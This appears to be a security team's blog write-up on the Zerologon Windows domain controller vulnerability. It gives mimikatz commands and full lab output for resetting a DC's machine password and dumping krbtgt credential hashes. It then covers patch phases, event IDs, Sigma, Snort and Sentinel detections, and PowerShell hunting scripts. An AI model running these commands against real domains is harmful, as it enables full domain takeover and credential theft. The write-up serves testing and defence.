TLDR

The Zerologon vulnerability allows an attacker with network access to a Windows Domain Controller to quickly and reliably take complete control of the Windows domain. As such, it is a perfect vulnerability for any attacker and a nightmare for defenders. It was discovered by Tom Tervoort, a security researcher at Secura and privately reported to Microsoft, which issued a patch for supported Windows versions as part of August 2020 updates and assigned it CVE-2020-1472.

Introduction

Netscylla has been investigating the vulnerability on a range of systems and testing several proof-of-concept (PoC) exploits. Real-world systems often behave differently from lab builds, and unintended consequences can happen.

Exploit

Affected Systems

  • Windows Server 2008 R2 (64-bit)
  • Windows Server 2012 and 2012 R2
  • Windows Server 2016
  • Windows Server 2019
  • Windows Server, version 1903/1909/2004

PoCs

Note: for the Python PoCs to work correctly, you'll need an up-to-date impacket.

Using Mimikatz

Commands (for copy-and-paste convenience):

lsadump::zerologon /target:dc1.exploit.local /account:dc1$
lsadump::zerologon /target:dc1.exploit.local /account:dc1$ /exploit
lsadump::dcsync /dc:dc1.exploit.local /authuser:dc1$ /authdomain:exploit.local /authpassword:"" /domain:exploit.local /authntlm /user:krbtgt

Important:

  • /target is the full FQDN of the target DC.
  • /account is the DC's computer account, i.e. its hostname followed by $.
  • The first command (without /exploit) only tests whether the DC accepts the all-zero credential; it changes nothing. The /exploit form sets the DC's machine account password in AD to an empty string without updating the secret the DC itself holds, which is why mimikatz warns "may be unstable": replication and anything else that uses the DC's machine account starts failing until the original password is restored. Only run it against a test domain you can rebuild.

Example Usage:

C:\Users\user\Downloads\Win32>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x86) #19041 Sep 18 2020 19:18:00
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::zerologon /target:dc1.exploit.local /account:dc1$
Remote   : dc1.exploit.local
ProtSeq  : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no

Target : dc1.exploit.local
Account: dc1$
Type   : 6 (Server)
Mode   : detect

Trying to 'authenticate'...
=========================================================================

  NetrServerAuthenticate2: 0x00000000

* Authentication: OK -- vulnerable

mimikatz # lsadump::zerologon /target:dc1.exploit.local /account:dc1$ /exploit
Remote   : dc1.exploit.local
ProtSeq  : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no

Target : dc1.exploit.local
Account: dc1$
Type   : 6 (Server)
Mode   : exploit

Trying to 'authenticate'...
===========================================================================

  NetrServerAuthenticate2: 0x00000000
  NetrServerPasswordSet2 : 0x00000000

* Authentication: OK -- vulnerable
* Set password  : OK -- may be unstable

mimikatz # lsadump::dcsync /dc:dc1.exploit.local /authuser:dc1$ /authdomain:exploit.local /authpassword:"" /domain:exploit.local /authntlm /user:krbtgt
[DC] 'exploit.local' will be the domain
[DC] 'dc1.exploit.local' will be the DC server
[DC] 'krbtgt' will be the user account
[AUTH] Username: dc1$
[AUTH] Domain  : exploit.local
[AUTH] Password:
[AUTH] Explicit NTLM Mode

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 22/09/2020 16:12:29
Object Security ID   : S-1-5-21-1015760042-408406534-773346051-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 1b8cee51fd49e55e8c9c9004a4acc159
    ntlm- 0: 75c424*****************58e088f92
    lm  - 0: 7c0800*****************df0fa84b0

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 0a17042d1d448f9266f9dafd4a7611cb

* Primary:Kerberos-Newer-Keys *
    Default Salt : EXPLOIT.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 810382037847ad39412f0aba970962ddfb796585330b97877a455c9582a05c68
      aes128_hmac       (4096) : b4c2cd6d8c005525316b006ca3c8cb51
      des_cbc_md5       (4096) : 4f45195db5972f3b

* Primary:Kerberos *
    Default Salt : EXPLOIT.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 4f45195db5972f3b

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  1563c7e64e0815b57efcfcb5ae22dc90
    02  3d61549adf12841ae05a09460b8edaed
    03  fb64dbb289618735c2da07b6a1f702f4
    04  1563c7e64e0815b57efcfcb5ae22dc90
    05  3d61549adf12841ae05a09460b8edaed
    06  1b6e21b21a8fd92ca8bf4d294bfc3f60
    07  1563c7e64e0815b57efcfcb5ae22dc90
    08  30a7542e7f5a3fa253623ca09c8fae36
    09  30a7542e7f5a3fa253623ca09c8fae36
    10  87e128fecc1e329456679440174cf983
    11  212e2fabaedea53a6027d6a92c2c0d6e
    12  30a7542e7f5a3fa253623ca09c8fae36
    13  cfc27bc0430086e95ab3426e1d9e7dfd
    14  212e2fabaedea53a6027d6a92c2c0d6e
    15  5d0fd6579eb09201d85744a7142999d9
    16  5d0fd6579eb09201d85744a7142999d9
    17  597bdfe4008ee6d70351bd984e23f306
    18  f517e48a822e71e63b17c44574fcde13
    19  7379256ad109be5d3d8c42a6815730fd
    20  6c8ecb285f193bcdf46022426ff5e6a2
    21  6bb3bf4cd601b7c44cb36586c70bec82
    22  6bb3bf4cd601b7c44cb36586c70bec82
    23  4a5cc09043c5089904392f3240fe51a8
    24  679dfdf11e1ec5b6a928a1acc30a49b4
    25  679dfdf11e1ec5b6a928a1acc30a49b4
    26  4517e188beee795177e2a2382b722cf6
    27  f6c02a4415a0dad8ccc15f913c4dcf25
    28  8b830ad87aab13f3c12a6d8f6eb2a6ae
    29  b554dbcba6aebf1931c299a502f35cff

mimikatz #

Results from our testing

On a freshly built, fully patched Windows Server 2016 Domain Controller we were vulnerable; the mimikatz output above is from that run.

However, against a hardened DC, one where a custom third-party GINA provides MFA and MFA is enforced for all DC user communication, the exploit failed. The error in our logs was event 5805: the machine failed to authenticate.

We spent time trying to get to the bottom of the error, to determine whether it was down to a specific hardening setting or to the 2FA authentication mechanism. In the end we concluded it was the third-party 2FA software that affected the success of the exploit. We therefore conclude that it is always worth testing an exploit against your own test domain, as real-life system improvements or changes can vastly change the outcome.

Patches, Updates, am I vulnerable?

You may be patched and still be vulnerable. Microsoft released the fix for CVE-2020-1472 in the August 2020 updates, but if you read the advisory in full you will see that it is rolled out in two phases.

  • Phase 1 (initial deployment, 11 August 2020 updates): installs the fix and adds new Netlogon event IDs (5827-5831) for logging and debugging. Patched DCs enforce secure RPC for Windows machine accounts, trust accounts and DC accounts, but still allow vulnerable Netlogon secure channel connections from other (non-Windows and third-party) device accounts unless enforcement mode is switched on early via the FullSecureChannelProtection registry value.
  • Phase 2 (enforcement, 9 February 2021 updates): forces enforcement mode on regardless of the registry value; vulnerable connections are denied unless the account is explicitly allowed by the "Domain controller: Allow vulnerable Netlogon secure channel connections" group policy.

You may also want to read https://support.microsoft.com/en-gb/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

Useful Event IDs (old and new)

  • Event ID 4742: a computer account was changed. After a Zerologon password reset the Subject shows ANONYMOUS LOGON, because the attacker never authenticated as a real principal.
  • Event ID 5805: a machine account failed to authenticate. Usually caused by duplicate computer names, a computer name that has not replicated to every domain controller, or, as in our testing, a custom GINA.
  • Event ID 4624: a successful logon. A 4624 (ANONYMOUS LOGON) followed by a 4724 (an attempt was made to reset an account's password) against the DC's own computer account is the footprint of a successful exploit.
  • Event ID 4662: an operation was performed on an object. A DCSync shows up as a 4662 carrying the DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) access rights from a source that is not a domain controller.
  • Event IDs 5827 and 5828: a vulnerable Netlogon secure channel connection was denied (machine account and trust account respectively).
  • Event ID 5829: a vulnerable Netlogon secure channel connection from a machine account was allowed (only logged during the initial deployment phase).
  • Event IDs 5830 and 5831: a vulnerable connection was allowed because the account is listed in the "Domain controller: Allow vulnerable Netlogon secure channel connections" group policy (machine account and trust account respectively).
  • Sysmon Event ID 3: network connection. Netlogon RPC is hosted in LSASS, so when Zerologon is exploited the inbound connection from the attacking machine to the Domain Controller's lsass.exe is logged here.
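The following PowerShell is an added example (not code from the original post or from Microsoft) that turns the two previous sections into something you can run on a DC: it reads the Netlogon enforcement state from the registry, summarises the new 5827-5831 events from the System log, and hunts the Security log for 4742/4724 changes performed by ANONYMOUS LOGON. The registry value names (FullSecureChannelProtection, VulnerableChannelAllowList) are the ones documented in KB4557222; the function names, the "SamAccountName" message-line filter and the default look-back window are our own assumptions. Run it in an elevated session on the domain controller.

```powershell
# Added example: Zerologon patch-state check and event hunting for a DC.
# Registry value names are from Microsoft KB4557222; function names are ours.
# Must run elevated on the domain controller (Security log access).

function Get-NetlogonEnforcementState {
    $key    = 'HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters'
    $params = Get-ItemProperty -Path $key -ErrorAction Stop

    # FullSecureChannelProtection = 1 switches a phase-1 DC into enforcement
    # mode early; after the February 2021 update the DC enforces regardless
    # of this value. Absent means the DC is in initial deployment mode.
    $full = $params.FullSecureChannelProtection
    if ($null -eq $full) {
        $state = 'not set (initial deployment mode on a phase-1 DC)'
    } elseif ($full -eq 1) {
        $state = 'enforcement mode'
    } else {
        $state = "value $full (not enforced)"
    }

    # VulnerableChannelAllowList backs the GPO "Domain controller: Allow
    # vulnerable Netlogon secure channel connections"; accounts listed here
    # may still use the vulnerable (non-secure RPC) channel.
    $allow = $params.VulnerableChannelAllowList
    if ([string]::IsNullOrEmpty($allow)) { $allow = '(none)' }

    [pscustomobject]@{
        FullSecureChannelProtection = $state
        VulnerableChannelAllowList  = $allow
    }
}

function Get-NetlogonSecureChannelEvents {
    param([int]$Days = 7)   # look-back window (assumption)
    # 5827/5828: vulnerable connection denied (machine / trust account)
    # 5829:      vulnerable connection allowed during initial deployment
    # 5830/5831: vulnerable connection allowed because of the allow-list GPO
    $filter = @{
        LogName      = 'System'
        ProviderName = 'NETLOGON'
        Id           = 5827, 5828, 5829, 5830, 5831
        StartTime    = (Get-Date).AddDays(-$Days)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Group-Object Id | ForEach-Object {
            # The message text names the account that used the channel; we keep
            # the lines labelled "SamAccountName" (label as seen in the event
            # text, assumed here) so each ID lists the accounts involved.
            $accounts = $_.Group | ForEach-Object { $_.Message -split "`r?`n" } |
                Where-Object { $_ -match 'SamAccountName' } |
                ForEach-Object { $_.Trim() } | Sort-Object -Unique
            [pscustomobject]@{
                Id       = [int]$_.Name
                Count    = $_.Count
                Accounts = $accounts -join '; '
            }
        }
}

function Find-AnonymousAccountResets {
    param([int]$Days = 7)
    # 4742 = computer account changed, 4724 = password reset attempt.
    # A Zerologon reset shows ANONYMOUS LOGON as the Subject because the
    # attacker never authenticated as a real principal.
    $filter = @{ LogName = 'Security'; Id = 4742, 4724; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Parse the EventData by field name rather than by property index,
        # so the lookup does not depend on the field order of either event.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if ($data.SubjectUserName -eq 'ANONYMOUS LOGON') {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Id      = $_.Id
                Target  = $data.TargetUserName     # the computer account that was reset
                Subject = $data.SubjectUserName
            }
        }
    }
}

Get-NetlogonEnforcementState
Get-NetlogonSecureChannelEvents | Format-Table -AutoSize
Find-AnonymousAccountResets     | Format-Table -AutoSize
```

A DC that reports "initial deployment mode" and has 5829 events is the case the section above warns about: patched, but still accepting vulnerable connections from the accounts those events name. Any 4742 or 4724 returned by the last function with a computer account as the target should be treated as an incident, not a curiosity.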

Detection

SOC Prime Sigma rule:

title: Possible CVE-2020-1472 (zerologon)
description: CVE-2020-1472 (Netlogon Elevation of Privilege Vulnerability) may create thousands of NetrServerReqChallenge & NetrServerAuthenticate3 requests in a short amount of time.
author: SOC Prime Team
date: 2020/09/11
references:
- https://github.com/SecuraBV/CVE-2020-1472
tags:
- attack.lateral_movement
- attack.T1210
logsource:
  product: zeek
  service: dce_rpc
detection:
  selection:
    endpoint: 'netlogon'
    operation: 'NetrServerReqChallenge'
  selection2:
    endpoint: 'netlogon'
    operation: 'NetrServerAuthenticate3'
  timeframe: 1m
  condition: selection or selection2 | count() by src_ip > 100
falsepositives:
- 'unknown'
level: high

Snort Rule

alert tcp any any -> [!<domaincontrollers to exclude here] [49152:65535] (msg:"Possible DCSync Detected"; flow:to_server,established; flags:PA; content:"|00 03 10 00 00 00|"; depth:8; content:"|03 00|"; distance:14; classtype:attempted-admin; sid:20166316;)

Azure Sentinel Query

Dce_Rpc | where (endpoint == "netlogon" and (operation == "NetrServerReqChallenge" or operation == "NetrServerAuthenticate3")) | summarize var = count() by SourceIp, bin(TimeGenerated, 1m) | where var > 100
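To show what the Sigma rule and the Sentinel query above actually do on the wire data, here is an added example (ours, not from SOC Prime or the original post) that applies the same threshold logic to Zeek dce_rpc records. It reads Zeek's JSON log format (ts, id.orig_h, endpoint, operation are Zeek's own field names), keeps only Netlogon NetrServerReqChallenge/NetrServerAuthenticate3 calls, and slides a 60-second window over each source's timestamps instead of counting per calendar minute, so a burst that straddles a minute boundary is still caught. The sample log lines, the function name and the thresholds are constructed for this example.

```powershell
# Added example: the Sigma/KQL threshold logic run over Zeek dce_rpc JSON.
# Field names are Zeek's; sample data and function name are constructed here.

function Find-ZerologonBursts {
    param(
        [string[]]$JsonLines,
        [int]$Threshold     = 100,   # same as the Sigma rule's "> 100"
        [int]$WindowSeconds = 60     # same as the Sigma rule's "timeframe: 1m"
    )
    $ops = 'NetrServerReqChallenge', 'NetrServerAuthenticate3'

    # Parse and keep only the Netlogon calls the Sigma selections match on.
    $events = foreach ($line in $JsonLines) {
        $r = $line | ConvertFrom-Json
        if ($r.endpoint -eq 'netlogon' -and $ops -contains $r.operation) {
            [pscustomobject]@{ Ts = [double]$r.ts; Src = $r.'id.orig_h' }
        }
    }

    # Per source, find the densest $WindowSeconds window (two-pointer sweep over
    # sorted timestamps) and report the source if it holds more than $Threshold
    # calls. A PoC needs ~256 authentication attempts on average, so a real
    # exploit run lands well above this; legitimate secure-channel setup is rare.
    foreach ($group in ($events | Group-Object Src)) {
        $ts = @($group.Group | Sort-Object Ts | ForEach-Object Ts)
        $start = 0; $best = 0; $bestStart = 0; $bestEnd = 0
        for ($end = 0; $end -lt $ts.Count; $end++) {
            while ($ts[$end] - $ts[$start] -gt $WindowSeconds) { $start++ }
            $count = $end - $start + 1
            if ($count -gt $best) { $best = $count; $bestStart = $start; $bestEnd = $end }
        }
        if ($best -gt $Threshold) {
            [pscustomobject]@{
                SrcIp = $group.Name
                Count = $best
                From  = [DateTimeOffset]::FromUnixTimeSeconds([long]$ts[$bestStart]).UtcDateTime
                To    = [DateTimeOffset]::FromUnixTimeSeconds([long]$ts[$bestEnd]).UtcDateTime
            }
        }
    }
}

# Constructed sample: 10.0.0.50 hammers the DC (150 calls in 30 seconds, the
# shape of a Zerologon PoC), 10.0.0.77 does a normal trickle (one call every
# ten minutes), plus one unrelated endpoint-mapper call that must be ignored.
$base   = 1600000000
$sample = @()
for ($i = 0; $i -lt 150; $i++) {
    $op = if ($i % 2 -eq 0) { 'NetrServerReqChallenge' } else { 'NetrServerAuthenticate3' }
    $sample += ('{{"ts":{0},"id.orig_h":"10.0.0.50","id.resp_h":"10.0.0.10","id.resp_p":49667,"endpoint":"netlogon","operation":"{1}"}}' -f ($base + [int][math]::Floor($i / 5)), $op)
}
for ($i = 0; $i -lt 6; $i++) {
    $sample += ('{{"ts":{0},"id.orig_h":"10.0.0.77","id.resp_h":"10.0.0.10","id.resp_p":49667,"endpoint":"netlogon","operation":"NetrServerReqChallenge"}}' -f ($base + $i * 600))
}
$sample += '{"ts":1600000001,"id.orig_h":"10.0.0.50","id.resp_h":"10.0.0.10","id.resp_p":135,"endpoint":"epmapper","operation":"ept_map"}'

Find-ZerologonBursts -JsonLines $sample | Format-Table -AutoSize
```

Run against the constructed sample, only 10.0.0.50 is reported (150 calls inside one window); 10.0.0.77 never exceeds one call per window and the epmapper record is dropped by the endpoint filter. Feed it real lines with `Get-Content dce_rpc.log` in place of `$sample`, and tune the threshold down if your DCs see very little legitimate Netlogon traffic.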
